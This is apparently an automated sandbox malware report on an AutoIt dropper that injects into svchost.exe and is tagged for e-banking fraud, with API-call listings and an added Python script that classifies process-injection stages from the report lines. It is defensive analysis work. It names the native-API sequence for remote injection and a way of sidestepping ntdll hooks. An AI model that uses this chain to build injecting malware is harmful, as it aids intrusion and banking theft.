                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C34164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00C34164
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C33F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C4CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

E-Banking Fraud

Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\new.exe | Code function 5_2_00BC3B3A: This is a third-party compiled AutoIt script.
Source: new.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: new.exe, 00000005.00000000.1271949253.0000000000C74000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_0d442cb3-8)
Source: new.exe, 00000005.00000000.1271949253.0000000000C74000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_77e2f752-6)
Source: new.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_dc85968d-5)
Source: new.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_184f8d1c-d)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042CCC3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03474340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03474650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03473010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03473090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03473D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03473D10 NtOpenProcessToken
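The Nt* wrappers listed above for svchost.exe (process 7) sit at 0x0347xxxx, addresses typical of a private allocation rather than of the loaded ntdll, and several of them call LdrInitializeThunk, which is what a freshly mapped ntdll copy looks like; together they cover the whole remote-injection sequence the report's signatures describe (open the target, allocate and protect, write or map a section, then NtQueueApcThread, NtSetContextThread and NtResumeThread). The following is an added example, not Joe Sandbox code or code from the sample: it parses "Code function" lines of the shape used in this report, maps the native APIs onto injection stages, and flags Nt* callers that lie outside an assumed ntdll image range. The ntdll range (0x77000000 to 0x771D0000) and the stage table are constructed assumptions, not values from the report.

```python
"""Added example (not Joe Sandbox code): turn 'Code function' lines into an
injection-stage verdict and flag Nt* callers outside ntdll's image."""
import re
from collections import defaultdict

# Stage -> native APIs that implement it; any one API satisfies the stage.
STAGES = {
    "target":  {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx", "NtCreateUserProcess"},
    "memory":  {"NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtCreateSection"},
    "write":   {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "execute": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread",
                "NtCreateThreadEx", "NtCreateThread"},
}
# Execution primitive -> technique label used in the verdict.
TECHNIQUE_BY_PRIMITIVE = {
    "NtQueueApcThread": "APC injection",
    "NtSetContextThread": "thread context hijack",
    "NtCreateThreadEx": "remote thread",
    "NtCreateThread": "remote thread",
}

# 'Code function: <proc>_<kind>_<addr> <api>,<api>,...'; works on the raw
# (fused) report lines too, because the trailing repeated id is not an API name.
LINE_RE = re.compile(
    r"Code function: (?P<proc>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8})[: ]*(?P<apis>[A-Za-z0-9_,]*)")
API_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def parse_functions(lines):
    """Yield (process, address, [apis]) for every 'Code function' line."""
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        apis = [a for a in m.group("apis").split(",") if API_RE.fullmatch(a)]
        yield m.group("proc"), int(m.group("addr"), 16), apis


def classify_injection(apis):
    """Map a process's native-API set onto injection stages and name the techniques."""
    present = set(apis)
    stages = {name: sorted(present & members) for name, members in STAGES.items()}
    stages = {name: hits for name, hits in stages.items() if hits}
    chain = all(stage in stages for stage in ("target", "write", "execute"))
    techniques = {TECHNIQUE_BY_PRIMITIVE[a] for a in present if a in TECHNIQUE_BY_PRIMITIVE}
    if {"NtCreateSection", "NtMapViewOfSection"} <= present:
        techniques.add("section mapping")
    return {"stages": stages, "injection_chain": chain, "techniques": sorted(techniques)}


def stubs_outside_ntdll(functions, ntdll_range):
    """(address, Nt* names) for functions that invoke Nt* APIs yet do not sit
    inside ntdll's image: a second ntdll mapping or hand-rolled syscall stubs,
    either of which sidesteps user-mode hooks on the loaded ntdll (heuristic)."""
    lo, hi = ntdll_range
    hits = []
    for addr, apis in functions:
        nt = [a for a in apis if a.startswith("Nt")]
        if nt and not lo <= addr < hi:
            hits.append((addr, nt))
    return hits


def analyze(lines, ntdll_range):
    """Per-process verdicts from a list of report lines."""
    per_proc = defaultdict(list)
    for proc, addr, apis in parse_functions(lines):
        per_proc[proc].append((addr, apis))
    report = {}
    for proc, funcs in per_proc.items():
        all_apis = [a for _, apis in funcs for a in apis]
        report[proc] = {
            "injection": classify_injection(all_apis),
            "stubs_outside_ntdll": stubs_outside_ntdll(funcs, ntdll_range),
        }
    return report


# Constructed: a subset of this report's lines in the cleaned layout. The ntdll
# range is an assumed 32-bit mapping, not a value measured in the sandbox.
ASSUMED_NTDLL_RANGE = (0x77000000, 0x771D0000)
SAMPLE = r"""
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042CCC3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03473D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03474340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03472B60 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C181CB AdjustTokenPrivileges,CloseHandle
"""

if __name__ == "__main__":
    for proc, verdict in analyze(SAMPLE.strip().splitlines(), ASSUMED_NTDLL_RANGE).items():
        print(proc, verdict["injection"]["techniques"],
              f"{len(verdict['stubs_outside_ntdll'])} Nt* callers outside ntdll")
```

On the sample above, process 7 satisfies every stage and is labelled with APC injection, thread context hijack and section mapping, while process 5 (the AutoIt dropper) matches nothing; the Nt* check is a heuristic and still needs the real ntdll base from the module list before it is trusted on a live dump.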
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C2A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C185B1 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BCE6A0
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BED975
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BCFCE0
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE21C5
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BF62D2
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C403DA
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BF242E
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE25FA
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BD66E1
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C1E616
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BF878F
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C28889
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C40857
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BD8808
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BF6844
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BECB21
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BF6DB6
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BD6F9E
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BD3030
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE3187
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BEF1D9
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BC1287
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE1484
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BD5520
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE7696
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BD5760
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE1978
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BF9AB5
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BEBDA6
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00C47DDB
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BE1D90
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BD3FE0
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BCDF00
Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00F5D600
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401C66
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00418D33
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00403045
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00403050
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040E8EA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040E8F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040296B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00402970
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00404A47
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042F2B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401440
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00403420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0041056A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00410573
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004025C6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004025D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00402E2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00402E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00416F1E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00416F23
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00410793
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040E79A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040E7A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034317EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FFCF2
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_046334D5
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0465DD41
Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe | Code function: 9_2_0463EFF8
